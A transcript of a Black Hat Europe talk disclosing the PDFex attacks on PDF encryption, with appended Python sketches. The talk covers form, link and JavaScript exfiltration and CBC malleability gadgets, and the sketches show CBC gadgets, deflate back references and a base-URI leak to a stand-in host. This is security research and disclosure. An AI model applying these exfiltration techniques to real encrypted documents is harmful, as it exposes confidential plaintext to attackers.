How to Break PDF Encryption

Okay, hello everyone, welcome to the talk on how to break PDF encryption at Black Hat Europe. My name is Jens Müller, I'm a PhD student at the Chair for Network and Data Security at Ruhr University Bochum in Germany, and this guy here is Fabian Ising from the University of Applied Sciences in Münster, Germany. Today we'll give you an introduction to our current research on security flaws in the PDF encryption standard, which is joint work with other researchers. We call this PDF exfiltration, PDFex for short. So what is PDFex? Some of you may have heard about it; it's yet another of those attacks that come with a logo. PDFex introduces two novel attacks on PDF encryption, which we are going to talk about today. Both of them are weaknesses, security flaws in the PDF encryption standard itself, and we found both of them simply by carefully reading the standard. One is based on flaws in the PDF document structure, which allows for partial encryption; we call this attack direct exfiltration. The other one is based on actual crypto flaws in the cipher mode of operation that is used; we call this attack malleability gadgets. So here's an overview of today's talk. First, I'm going to give you a short introduction to PDF and who actually uses PDF encryption. Then I'm going to introduce our attacker model and show our first attacks on how to directly exfiltrate the plaintext of encrypted documents without even touching the crypto. And because, to be honest, I don't know much about crypto, from there on Fabian will take over and show our cryptographic attacks, CBC malleability gadgets, and how to practically apply them to PDF documents, followed by an evaluation of 27 popular PDF viewers and some mitigations on how to counter these attacks. Okay, let's start with some facts on PDF. Who of you has never ever heard of PDF? Good, nobody. Okay, so we're on the same page here. We're all familiar with the Portable Document Format; it's basically the de facto standard for
electronic document exchange these days. PDF was originally invented by Adobe, released in the early 90s, and later became an ISO standard, with PDF 2.0 released about two years ago by ISO. According to Adobe, 250 billion PDF documents were opened in their products last year. That's a lot, and that's where all our telemetry data goes to, obviously. PDF is used by almost every company and institution out there. To measure the actual popularity of PDF, let's have a quick look at Google Trends for the search term "PDF". As we can see, the trend is constantly increasing, but maybe the number of Internet users has simply been increasing too. So to really measure the popularity of PDF, let's compare it to another keyword: let's compare PDF to the Queen. What you can see here is that PDF is currently almost as popular as the Queen, and those are statistics for the UK only. Okay, I hope I could convince you that PDF is a rather popular file format. PDF also supports AES document encryption, using either password-based or certificate-based crypto, and AES is considered pretty secure, right? I mean, come on, AES: if someone is able to break AES, the sky is falling anyway. So maybe we should give up here. We didn't want to give up yet, so we thought, well, let's have a closer look at how encryption is actually applied in the PDF standard; maybe they did something wrong. But first, let's look at who actually uses PDF encryption. For example, a local bank in Germany uses PDF encryption. They know that their customers cannot handle PGP and S/MIME, so they send all sensitive information as an encrypted PDF attachment within an otherwise unencrypted email, and they send the password over a second channel, via SMS for example. Why not? And there are some companies that even allow you to do this directly within mail clients, so
they sell plug-ins for Outlook, for example, and you can use PDF encryption as a substitute for PGP or other email encryption. A lot of modern scanners also allow you to directly encrypt scanned documents, and especially if you use features like scan-to-email, this can make sense. Last but not least, PDF encryption is used by companies and governments worldwide; for example, this is the US Department of Justice, which claims to use PDF encryption. So we thought that maybe it's worth having a deeper look at PDF encryption. But first, let's have a look at our attacker model. We're both academia guys, so we need a formal attacker model, or maybe not so formal in this case. Assume Alice wants to send a PDF document to Bob, and she encrypts the document because the communication channel cannot be trusted, let it be email or whatever. Or let's assume there's some kind of shared cloud storage service: Alice uploads an encrypted PDF document there, Bob downloads it later, and the storage may also be accessible by third parties, like other users for example. In such cases we cannot rely on TLS; we need actual end-to-end encryption, and PDF encryption is a logical candidate for this workflow, right? Okay, now what is our attacker allowed to do? Our attacker is an active man-in-the-middle who can perform targeted modifications of encrypted PDF documents, either in transit or at rest. The attacker can change the document structure, or manipulate the actual ciphertext by flipping some bits and so on, before relaying the modified document to Bob, the intended receiver. So the document is still encrypted, but some changes have been made; we'll see that later. We assume that a really strong password is used for this document, so offline cracking or things like that will
not work. Okay, now Bob enters this super secret password, or uses some certificate for decryption, and then, for reasons you'll see later, the plaintext is leaked to the attacker's server. It is important to note that this is not an offline attack; this is obviously an active man in the middle. But the whole reason to use end-to-end encryption is that you assume there may be some malicious party in the middle. This is exactly the attacker model that end-to-end encryption should protect you from. Okay, now how does PDF encryption technically work? Let me first give you some PDF basics, which result in the direct exfiltration class of attacks. Let's have a look at a simplified PDF document structure. A PDF document usually consists of four parts. There's a header, just a one-liner containing the PDF version used in the document, like 1.7 or 2.0. Then there's a body section, which contains the actual content meant to be displayed, the definition of all the pages; this is the important section, containing all the objects that are displayed when you open the file. There's usually a cross-reference section, which contains an index table defining the offsets of the objects, and there's the trailer section, which contains some more information, like a reference to the root element of the document. As a side note, PDF documents are usually processed from the bottom to the top. Okay, now let's encrypt this very document and spot the differences. That's interesting: as you can see, most of the structure is left unencrypted. All that happened is that an Encrypt entry was added to the trailer, pointing to a dictionary that contains information like which encryption scheme is used, AES-256 or whatever, and the only objects containing actual encrypted content are the objects that are displayed when you open the
document, like content streams for example. Why is the structure unencrypted? Let's have a look at the standard. The PDF standard says that all strings and streams in a document are to be encrypted, but not other object types such as integers or boolean values; the idea is that strings and streams are what hold the sensitive information. The reason for this is efficiency: random access to all objects in the document should be possible, even for encrypted documents. Fair enough. What does that mean in practice? Basically, the whole structure of a PDF document is unencrypted; only the strings and streams in the document are encrypted. In other words, a passive attacker who obtains an encrypted document can already learn a lot about it, like the number of pages, their size, the number of objects in the document, whether there are any hyperlinks, and so on and so forth. That may be interesting already, but it's not the really relevant displayed content. But maybe there's more, so let's once again have a deeper look at the standard. In 2003, PDF introduced crypt filters. Crypt filters provide finer granularity control of encryption within a PDF file. What does that mean in practice? It means that not all content streams in a document have to be encrypted: you can nowadays create a document of which some content is encrypted and other content is not. There may be legitimate use cases for this, but it also means that every standard-compliant PDF application must support partial encryption, and it is very often bad when file formats allow things like that. In other words, an active attacker on the network can very easily modify a document and add his own content to an otherwise encrypted document. And it's not only crypt filters: by carefully studying the specification, we found 18 different methods to actually do
this. So it's fair to say that it's hard to implement a PDF viewer that does not support partial encryption, that does not support mixing unencrypted with encrypted content. This allows us to do simple overlay attacks. What you can see here is that we open an encrypted document with Adobe, or any other PDF viewer, we insert our password, and we can see some encrypted text. Now let's open this document with a text editor: we can see some garbage, that's the encrypted part, and we can see that AES is used to encrypt the document. Now we insert our own object number 6, using a crypt filter without any arguments, which means that the content is actually not encrypted. Now let's add this object number 6 to the contents of the PDF document and save it. Let's reopen it with Adobe or another reader, insert our password again, and you can see that a string has been added, reading "Black Hat Europe 2019". So it is relatively easy for an attacker to add new content to otherwise encrypted documents. Now you might say, well, fair enough, the standard claims protection for confidentiality but not for integrity, and we just broke the integrity here, right? So the question is: can we do more? Can we use this technique for targeted modifications of the document structure that somehow exfiltrate the plaintext? Let's have a look at the standard again. If you search the specification for ways a document can communicate with the outside world, you will quickly spot various actions, such as the SubmitForm action. Similar to HTML, PDF can contain forms: you can insert some values and then save the document, print it, and so on, but you can also submit it by clicking a button in the document. And this is quite interesting, because the values of form fields can be a reference to any string or stream in
the document, as the standard says. So wait, wait: those are exactly the two content types that are encrypted, the only content types that are actually unknown to an attacker, and they can be submitted using a form. So we thought, maybe we can craft a special document with some button, and then use social engineering to trick the user into clicking that button, thereby leaking the plaintext. But then we thought that clicking buttons is lame; we are not going to get into Black Hat if we let users click buttons. So we consulted the standard again and spotted various options to trigger actions, basically events that allow you to submit a form, for example once you open the document, close the document, print the document, and so on. The easiest example is an OpenAction added to the document: once the document is opened, the OpenAction triggers the SubmitForm action, which then leaks the plaintext. Let's put this all together. What you can see here is a minimal encrypted document with one single content stream. We add a form field that refers its value to object number 2, which is the encrypted content stream, and then we add an OpenAction to submit the form automatically once the document is opened, to http://p.df, which is the attacker's web server. The idea is that once the document is opened, the content is automatically exfiltrated. This is not a theoretical issue; let's try this in Adobe. Once again, we modify our encrypted document using a simple text editor, and we add an Identity crypt filter for all strings in the document. So all streams in the document remain encrypted, but strings are not encrypted anymore. This allows us to easily add things like a URL with an OpenAction; in this case, the URL of the attacker's server to submit the form fields to, and the value of the form
field is object number 4, the encrypted data. Let's save this modified document and send it to Bob, our victim. Maybe we run netcat or some other server to receive incoming traffic on the attacker's host. Let's open the document in Adobe and insert the password. What happens is that current versions of Adobe show a dialog asking whether you want to submit data to the attacker's server, and once you allow it for that server, it will always be allowed. A lot of readers will not ask you at all; current versions of Adobe ask you before leaking the encrypted text. However, Adobe makes the DNS request before you click yes or no; it sends the DNS request before you even have a chance to click. So you can leak up to 250 bytes of plaintext within a subdomain of the attacker's server without any user interaction. All you need is an attacker-controlled DNS server for your own domain, or Burp Collaborator or whatever, which is pretty easy to get. Okay, there are some other options to leak plaintext. You can also include links in documents, clickable links like in HTML, but you can also open links automatically once the document is opened, or trigger them when the user clicks somewhere in the document, and things like that. And similar to HTML, PDF also allows you to define a base URI. In this case, we define a base which is our attacker's server, http://p.df, and all relative URLs in the document are opened with this domain prepended. So once this document is opened, a web browser opens and the plaintext is exfiltrated within the path of the URL. This is a bit less silent than the forms issue you have seen before, because it opens a web browser, but it's still pretty interesting, and a lot of PDF viewers support hyperlinks but
will not submit forms. And last but not least, there's also JavaScript in some PDF viewers, which allows you to do pretty much the same: access the plaintext content and leak it, if scripting is supported. Okay, so much for the super easy attacks. I call them easy because they can easily be crafted, but they can also easily be detected by having a closer look at the document structure. So we thought: can we do more? Can we somehow modify the document's plaintext by performing targeted modifications on the ciphertext level itself? And because I suck at crypto, from here on Fabian came around, had a closer look at the crypto, and applied all his crypto magic tricks to PDF. Yeah, thank you. So let's talk about encryption in PDF, in a broader sense, starting with its history. The first version of the standard didn't have any encryption defined, but after that Adobe decided to add RC4 encryption with a 40-bit key. Those were export cipher times, so that was fine for them. Then they added 128-bit keys, and all of this is deprecated by now. Then, in versions 1.6 and 1.7, around the point when PDF also became an ISO standard, they added AES-CBC with a 128-bit key, and this is the real news. In newer versions they updated that to use 256-bit keys. What's important here is that the key derivation function changed multiple times. It was broken a lot of times, it was a weird key derivation function, and nobody could really say anything about it. But in the latest version they changed it to a document-wide key: before, every object had its own key for encryption and decryption, but now the key is the same for all objects, so every ciphertext uses the same key. This will be relevant later. So where there's encryption, there must be some form of integrity protection, right? You want
to build a secure data format, so you should have some way to prevent an attacker from modifying your document. Well, in PDF there is none: no MAC, no authenticated encryption, so no AES-GCM. It's simply AES-CBC without any integrity protection. That got us thinking: haven't we seen this somewhere before? Some of you might remember our attacks from last year, the EFAIL attacks, or CBC gadget attacks on encrypted emails in S/MIME and OpenPGP, and basically the attacks we applied here are pretty similar. But if you don't remember, no worries, I'll brush you up on that. These malleability gadget attacks mainly require three ingredients. First, we need ciphertext malleability, which we get from having no MAC; we'll come to that. Second, to perform malleability attacks we almost always need some known plaintext: we need to know some part of the plaintext to be able to modify the ciphertext accordingly. And finally, of course, if we want to leak plaintext to an attacker, we need an exfiltration channel. Well, courtesy of Jens, we already have that: we can simply reuse forms and hyperlinks to exfiltrate the content to the attacker. So let's look at ciphertext malleability. Some of you might remember this graphic from Crypto 101 or whatever crypto lecture you had. This is the decryption function of AES-CBC: the ciphertext is up here, the plaintext down here, and it works by taking a block of ciphertext, decrypting it, and XORing the previous ciphertext block onto it to get the plaintext. So what happens if you change a single bit in the ciphertext, like in the initialization vector, the IV up here? Well, the very same bit changes in the plaintext, due to this XOR operation. So you can flip bits in the plaintext. But you can do more: if you happen to have some known plaintext, for example if you know the first block P0 down here, then you can simply XOR P0 onto the IV and
get what we call a gadget. It's all zeros down here, basically a blank sheet of paper, and you can put it anywhere in the ciphertext and have a blank sheet of paper there. So what can you do with the gadget? Well, you can XOR chosen plaintext onto it: simply take your URL, http://p.df, XOR it onto the IV, and you get the URL in the decrypted plaintext. That works quite nicely at the beginning of the document, but as I said, you can copy a gadget and use it somewhere else. If you do that, this happens: we move the gadget to the right within the ciphertext, and because of the avalanche effect we get some random bytes. We don't know the decryption value of this block, so we don't know what the result here is, but we still get our actual URL down here. So we have to deal with the random bytes somehow; I'll show you how we do that. That's ciphertext malleability done; let's move on to known plaintext. As I said, we need to know some part of the plaintext to build a gadget, so we had a look at the standard again to see whether something in there helps us with that. We came to look at the permission management of PDF. In one of the first versions of PDF, Adobe decided that maybe only the author should be able to edit a document after creating it, or that users shouldn't be able to print it. So they added a value P, a bit mask where every bit corresponds to a permission. Of course, people started tampering with that, because it was basically left in plaintext in the document, and who wouldn't change a single number if that's how to break the permission management? So the ISO working group decided in PDF 1.7 that this should of course be encrypted as well. The original value was left in place, and any compliant viewer has to compare it to the encrypted value to be sure that nobody changed it. Okay, so how does it look? They
used AES-256 for this, and therefore they need a full block of plaintext. The first eight bytes hold the permission value P, the four-byte bit mask of permissions extended to eight bytes with all-ones bytes. Next, they put a character, T or F for true or false, to show whether the document's metadata is encrypted. Then they put the acronym "adb" in there, for Adobe probably. And finally, to fill up the sixteen bytes, there are four random bytes, which are unknown to us. But we know the first 12 bytes of that block, so that's known plaintext by design, and that is quite nice. Let me show you how that looks in an actual document. We have this encryption dictionary, and you can see down here the P value I mentioned; that's the unencrypted bit mask of permissions, and the Perms value is the extended value I showed you on the last slide, encrypted with AES. Now remember what I told you about the key derivation: in the newer versions they use a document-wide key, which means that every ciphertext in this document is encrypted under the very same key. So the known plaintext from the Perms value can be reused for any other ciphertext. To sum that up: Adobe decided to add permission management to the PDF format, the ISO standardization group decided to encrypt it to prevent tampering, and now there's known plaintext available to attackers, and that's great. So that's all ingredients done; let's look at what we can do with them. Remember, we only have 12 bytes of known plaintext, that's the difference to a complete gadget, but we found that this is enough to change the displayed text. So for an overlay attack again, we simply use a gadget to insert text followed by a comment sign, and the random bytes, 4 bytes of unknown plaintext from the Perms value and 16
bytes from the avalanche effect I've shown you, are commented out. How would this look in a document? Basically like this: here I created a completely new object inside. So overlay attacks can be done with gadgets again. Now let's talk about really exfiltrating plaintext, because that's why we are here. Let's look at forms again. You have seen a form a few slides back with Jens, and again the form field points to the actual encrypted data, and the URL is now a gadget. We simply put a short URL in there, http://p.df, which is around 12 bytes, and we can use that to exfiltrate data again. We'll see how this is done automatically in Chrome in the next demo. Okay, the user opens the original document and puts in the password; the text is displayed, awesome, no problem. We see the secret text, "hello black hat", and we want to leak that. I've prepared a script that performs the gadget attack for you. It takes the known plaintext from the Perms value, generates a blank gadget from that, generates the URL gadget, sets the value as a string value to make it look nicer, and then we send the document. We start the HTTP server, open the modified document, the user inputs the password again, and there's the plaintext. And it's not only the plaintext, it's actually the whole stream, so we see everything inside the object we leaked. That's pretty nice, and it was automatic; that was fixed in newer versions of Chrome, of course. Okay, let's look at hyperlinks. We can not only change the displayed text or define new URLs, we can also prepend URLs to existing ciphertext, so now we manipulate an existing object. We do that by simply prepending a gadget to the original ciphertext, and we get a URL. Of course, there are 20 random bytes in that, which might break your link, and in practice it does quite often. So let me talk about issues with
that. Our gadgets are short, which means all our URLs are short, and short is bad: you might be hard-pressed to get the domain p.df in real life. And there are random bytes in the URL, which might break it. So this is all a bit flaky; it's not as stable as it should be. And as I mentioned before, CBC uses PKCS#7 padding, and if you don't know the last bytes, that's bad, because you can't fix the padding, and so on and so on. Another problem was that most plaintext in PDF documents is actually compressed, and compressed plaintext is harder to exfiltrate. If you simply ignore the compression and prepend a URL, that will again break the URL, because to the URL parser the compressed data is basically random bytes, and prepending or appending text to compressed plaintext is more complicated. So we could have stopped, but we thought, well, maybe compression can do something for us. The compression used is the so-called deflate compression, and deflate has two nice properties for us. First, the compressed data stream is separated into so-called segments, or blocks, and segments can be uncompressed or compressed. So you can mark a segment as uncompressed, write plain text in it, and then say this segment is over, start with the next one. Second, the actual compression is performed using so-called back references, so I can refer back to an earlier segment and reuse it in the plaintext. So let's build this from the ground up with gadgets. This is the original content, already decompressed; of course in the ciphertext it will be compressed, but this way you can read it. Let's add some gadgets in front of that. We start by adding the deflate (zlib) header, the header values that have to be in front to let the viewer know that this is compressed data. Of course, there are random
bytes, so let's ignore those for now and start the next gadget. This is our URL again, with random bytes, which would be bad, but the next gadget is actually the first one that will be interpreted by the reader, because we said, hey, the object starts at byte offset 65; you have to believe me on that one. We put a back reference in there, and suddenly we have a perfect URL: we tell the deflate algorithm to remember the URL we wrote back here and just reuse it here, and it comes together perfectly. So how do these attacks work in practice, against actual viewers? Let's talk about the evaluation. We tested 27 more or less popular PDF viewers and found all of them vulnerable to at least one of our attacks. We differentiated between attacks with no user interaction, like the one you saw in Chrome, where you open the document and the plaintext is already leaked, and those with user interaction. That might be clicking somewhere in the document, if we overlay the whole page with a link for example, or it might be the dialog boxes you have seen in Adobe. But as you can see, a lot of viewers are vulnerable to attacks without any user interaction. Let's look at some of the more popular viewers, Adobe and Foxit. You've seen Adobe before, and as Jens already told you, via some DNS magic we can exfiltrate 250 bytes of plaintext without any user interaction. For Foxit and Adobe, the malleability gadgets behave a bit differently because the viewers are implemented differently, which is why the results differ between the two attacks. Most readers are not perfectly standard-compliant, so different attacks work for different viewers, but still, for Foxit and Adobe we have at least attacks with user interaction. We could also break both viewers we tested on macOS, with user interaction again, and, as you have seen, in Chrome, and also Opera because it uses the same engine, we had exfiltration without any user interaction. So all in all the results are not so nice, because all readers are
vulnerable. So let's talk about fixing this. You might think signatures would work, right? Signatures provide some kind of integrity, PDF actually supports cryptographic signatures, and that should prevent the attack, right? Not so much. For one, signatures do not prevent opening a document: a broken signature does not stop you from opening it, because it's not mandatory that there's a signature or that it's valid. So your plaintext might be leaked before you even see the document. You will get a warning, but by then it's too late. Also, signatures can be stripped: they are not encrypted and they are not mandatory, so the attacker can simply strip the signature from the document, or even add their own. So again, they won't help you. And some members of our team presented attacks on PDF signatures this year and showed that in most viewers signatures can be easily forged. So again, that's bad. Closing back channels might help, right? Yes: if we have no way to get plaintext to the attacker, there's no way to leak it. But that is rather hard to do. The PDF standard is 800 pages long by now, and we merely scratched the surface with forms, hyperlinks, and maybe JavaScript. There might be more, and should we really remove all of them? Don't you want forms in encrypted PDFs? Don't you want links? Links might be the worst: who doesn't want links in their PDF documents? And should we really remove JavaScript? Okay, maybe we should. But the single thing we can do as implementers of PDF viewers is to ask the user before connecting to a server, to show a dialog like Adobe does, informing the user that a connection to a web server is about to be made. But not all viewers do. So what were the reactions, what were some short-term mitigations? One vendor decided to do exactly that: add a dialog showing you the whole URL, and that URL contains the leaked plaintext, so it should be easy to recognize, and you will probably not click
that link, at least most of you won't. Google, on the other hand, fixed the automatic form submission bug, but after that they simply decided to stop trying to fix the unfixable, and we think they are pretty right about that, because the ones who have to fix this are the ISO standards group. These attacks shouldn't be possible in the first place. So let's look at some real mitigations. Against direct exfiltration attacks: deprecate partial encryption. Very few documents actually need unencrypted parts in encrypted documents, so very few documents would be affected; simply remove it. And as a short-term fix, disallow access from unencrypted to encrypted objects: if a form with an unencrypted URL cannot access an encrypted value, there's no problem for now. Against CBC gadgets, it's easy as well: use authenticated encryption, so AES-GCM, or if you really must use CBC, at least add a MAC. But then be careful of downgrade attacks, and change the key derivation function so that downgrade attacks can be detected. Okay, so what did Adobe say about that? Adobe's reaction was that this has been escalated to the ISO working group on cryptography and signatures and will be taken up in the next revision of the PDF spec. So I guess that's a win. All in all: PDF documents allow for partial encryption, which leads to direct exfiltration attacks that leak plaintext. PDF uses legacy crypto like unauthenticated CBC, which leads to gadget attacks, which again lead to exfiltration of plaintext. Therefore PDF is a data format that can exfiltrate itself, like encrypted email, as we showed last year. You can reach us at this email address if you have any questions, and on this website you will find all the details, the papers on both PDFex and the attacks on signatures, and you can also find all the exploit PDFs. So if you don't believe what you read on the slides,
you can test it yourself. And yeah, that's it, thank you. Any questions? Hi, yeah: will your method work to reveal redacted information in a PDF document, where the owner of that PDF document has redacted the information using a recent version of Adobe? So the question is whether you can uncover redacted text in recent versions of Adobe. This is about encryption, so it's a bit off-topic, but we looked at exactly this last week, and no: the redaction functions of all modern PDF viewers are actually pretty well implemented these days. If you use the actual text redaction function, it works on the underlying objects and really redacts the text. In Adobe, if you just delete the text or object instead, under some circumstances it will still be in the document. As I said, it's got nothing to do with encryption, but it's quite interesting: if you export from other applications like Word and so on, the redaction function may not be that good, as we see in the news all the time when people manage to unredact text in documents. Okay, all right, thank you. [Applause]
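The talk points out that PDF encrypts only strings and streams, so the document structure stays readable to a passive attacker. A minimal sketch of what that leaks, assuming a made-up, heavily abbreviated "encrypted" PDF (the sample bytes are invented for illustration) and a simple regex scan standing in for a real PDF parser:

```python
import re

# Made-up, heavily abbreviated "encrypted" PDF: only the stream bytes and the
# string inside (...) would be ciphertext; names, integers and arrays stay readable.
SAMPLE = b"\n".join([
    b"%PDF-1.7",
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj",
    b"2 0 obj << /Type /Pages /Kids [3 0 R 4 0 R] /Count 2 >> endobj",
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 5 0 R >> endobj",
    b"4 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /Annots [6 0 R] >> endobj",
    b"5 0 obj << /Length 8 >> stream\n\x8a\x13\xf0\x07\xc2\x99\x5e\x41\nendstream endobj",
    b"6 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (\x9f\x02\xd7) >> >> endobj",
    b"trailer << /Root 1 0 R /Encrypt 7 0 R >>",
    b"%%EOF",
])


def structure_summary(pdf: bytes) -> dict:
    """Collect metadata readable without any key (regex scan, not a real PDF parser)."""
    return {
        # Indirect object headers such as "3 0 obj".
        "objects": len(re.findall(rb"\b\d+ \d+ obj\b", pdf)),
        # "/Type /Page" but not "/Type /Pages".
        "pages": len(re.findall(rb"/Type\s*/Page\b", pdf)),
        # Page sizes are plain integer arrays, so they are never encrypted.
        "media_boxes": re.findall(rb"/MediaBox\s*\[([^\]]*)\]", pdf),
        "has_links": b"/Subtype /Link" in pdf,
        "encrypted": b"/Encrypt" in pdf,
    }


print(structure_summary(SAMPLE))
```

Even with the content stream and link target unreadable, the page count, page sizes and the presence of a hyperlink are visible.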
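For the hyperlink channel described in the talk, PDF lets a document declare a base URI (the /Base entry of the catalog's URI dictionary), and relative links are resolved against it. A minimal sketch of that resolution step, assuming a hypothetical attacker domain `attacker.example` and assuming the viewer percent-encodes the link text (real viewers may encode differently); Python's `urljoin` stands in for the viewer's URI resolution:

```python
from urllib.parse import quote, urljoin

# Hypothetical attacker-controlled base URI (stands in for the talk's short domain).
BASE = "http://attacker.example/leak/"


def resolve_relative_link(base: str, relative: str) -> str:
    """Resolve a relative link against a document base URI, as a viewer would."""
    # Percent-encoding the link text is an assumption about viewer behavior.
    return urljoin(base, quote(relative, safe=""))


# If the "relative link" is the decrypted content, it ends up in the URL path.
print(resolve_relative_link(BASE, "hello black hat"))
```

Whatever text the viewer treats as the relative link lands in the request path sent to the base host, which is why the base URI turns ordinary links into an exfiltration channel.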
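The CBC malleability argument from the talk (flip an IV bit to flip a plaintext bit, XOR a known plaintext block onto the previous block to get a blank gadget, then XOR in chosen text) can be checked in a few lines. This is a sketch under a loud assumption: a keyed SHA-256 truncation stands in for AES block decryption, because the attack only uses CBC's XOR chaining and never needs the real cipher. The names `toy_block_decrypt` and `make_gadget` are illustrative, not from the talk:

```python
import hashlib
import os

BLOCK = 16


def toy_block_decrypt(key: bytes, block: bytes) -> bytes:
    # Stand-in for AES block decryption (NOT a real cipher). CBC malleability only
    # depends on the XOR chaining, so any fixed keyed function of the block will do.
    return hashlib.sha256(key + block).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cbc_decrypt(key: bytes, iv: bytes, blocks: list) -> list:
    # CBC decryption: P_i = D_K(C_i) XOR C_{i-1}, with C_{-1} = IV.
    plain, prev = [], iv
    for c in blocks:
        plain.append(xor(toy_block_decrypt(key, c), prev))
        prev = c
    return plain


def make_gadget(prev: bytes, known: bytes, chosen: bytes) -> bytes:
    # (prev XOR known) equals D_K(C_i): used as the previous block, C_i decrypts
    # to all zeros (the "blank sheet"). XORing in `chosen` makes C_i decrypt to it.
    return xor(xor(prev, known), chosen)


key, iv, c0 = os.urandom(BLOCK), os.urandom(BLOCK), os.urandom(BLOCK)
p0 = cbc_decrypt(key, iv, [c0])[0]  # assume the attacker knows this plaintext block

# 1) Flipping one IV bit flips the same plaintext bit.
flipped_iv = bytes([iv[0] ^ 0x01]) + iv[1:]
print(cbc_decrypt(key, flipped_iv, [c0])[0][0] == p0[0] ^ 0x01)  # True

# 2) Moving the gadget (X, C0) elsewhere: X decrypts to garbage, C0 to chosen text.
chosen = b"http://p.df/abcd"  # exactly 16 bytes
x = make_gadget(iv, p0, chosen)
out = cbc_decrypt(key, iv, [os.urandom(BLOCK), x, c0])
print(out[2] == chosen)  # True
```

The block before the chosen text (`out[1]`) is unpredictable, which is the random block the talk then has to hide with comments or deflate tricks.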
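The Perms value is where the known plaintext comes from. A sketch of its first 12 plaintext bytes, following the layout in ISO 32000-2 (P extended to 64 bits with the upper 32 bits set, low-order byte first; then 'T' or 'F' for EncryptMetadata; then 'adb'; the last four bytes are random and unknown). The P value used below is only an example, and `perms_known_prefix` is an illustrative name:

```python
import struct


def perms_known_prefix(p: int, encrypt_metadata: bool = True) -> bytes:
    """First 12 plaintext bytes of the /Perms block; bytes 12-15 are random."""
    # Bytes 0-7: P as a 64-bit value with the upper 32 bits set to 1, low-order byte first.
    extended = struct.pack("<I", p & 0xFFFFFFFF) + b"\xff" * 4
    # Byte 8: 'T' or 'F' for EncryptMetadata; bytes 9-11: the literal 'adb'.
    return extended + (b"T" if encrypt_metadata else b"F") + b"adb"


prefix = perms_known_prefix(-3904)  # example P, read from the unencrypted /P entry
print(prefix.hex(), len(prefix))
```

Since everything above is derivable from the unencrypted /P and /EncryptMetadata entries, an attacker knows 12 of the 16 bytes, which is exactly enough for a 12-byte chosen prefix such as `http://p.df/`.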
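The two deflate properties the talk relies on, uncompressed ("stored") segments and back references, can be shown with a hand-built stream per RFC 1951. This is a sketch, not the authors' exploit: it writes a stored block containing a URL, then a fixed-Huffman block whose single back reference (length 12, distance 12) copies that URL again. PDF's FlateDecode wraps deflate data in a zlib header; to keep it short, this sketch uses raw deflate (`wbits=-15`):

```python
import struct
import zlib


class BitWriter:
    """Packs bits the way DEFLATE expects: starting at the LSB of each byte."""

    def __init__(self) -> None:
        self.out = bytearray()
        self.acc = 0
        self.nbits = 0

    def write_bits(self, value: int, count: int) -> None:
        # Header fields and extra bits: least-significant bit first.
        for i in range(count):
            self.acc |= ((value >> i) & 1) << self.nbits
            self.nbits += 1
            if self.nbits == 8:
                self.out.append(self.acc)
                self.acc, self.nbits = 0, 0

    def write_code(self, code: int, length: int) -> None:
        # Huffman codes: most-significant bit first.
        for i in reversed(range(length)):
            self.write_bits((code >> i) & 1, 1)

    def getvalue(self) -> bytes:
        # Pad the final partial byte with zero bits.
        if self.nbits:
            self.out.append(self.acc)
            self.acc, self.nbits = 0, 0
        return bytes(self.out)


def stored_block(data: bytes, final: bool) -> bytes:
    # Stored block: 3 header bits (BFINAL, BTYPE=00) padded to a byte, LEN, NLEN, raw data.
    header = 0x01 if final else 0x00
    return bytes([header]) + struct.pack("<HH", len(data), len(data) ^ 0xFFFF) + data


def back_reference_block() -> bytes:
    # Final fixed-Huffman block with one match (length 12, distance 12), then end-of-block.
    w = BitWriter()
    w.write_bits(1, 1)          # BFINAL = 1
    w.write_bits(0b01, 2)       # BTYPE = 01 (fixed Huffman)
    w.write_code(0b0001001, 7)  # length code 265 (lengths 11-12)
    w.write_bits(1, 1)          # 1 extra bit: 11 + 1 = 12
    w.write_code(6, 5)          # distance code 6 (distances 9-12)
    w.write_bits(3, 2)          # 2 extra bits: 9 + 3 = 12
    w.write_code(0, 7)          # code 256: end of block
    return w.getvalue()


url = b"http://p.df/"
stream = stored_block(url, final=False) + back_reference_block()
print(zlib.decompress(stream, wbits=-15))  # raw DEFLATE, no zlib header
```

The second copy of the URL is produced purely by the back reference, which is the trick that lets the talk's gadgets place a clean URL next to otherwise random bytes.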
Info
Channel: Black Hat
Views: 17,538
Id: phLOQ0pROag
Length: 44min 16sec (2656 seconds)
Published: Wed Mar 18 2020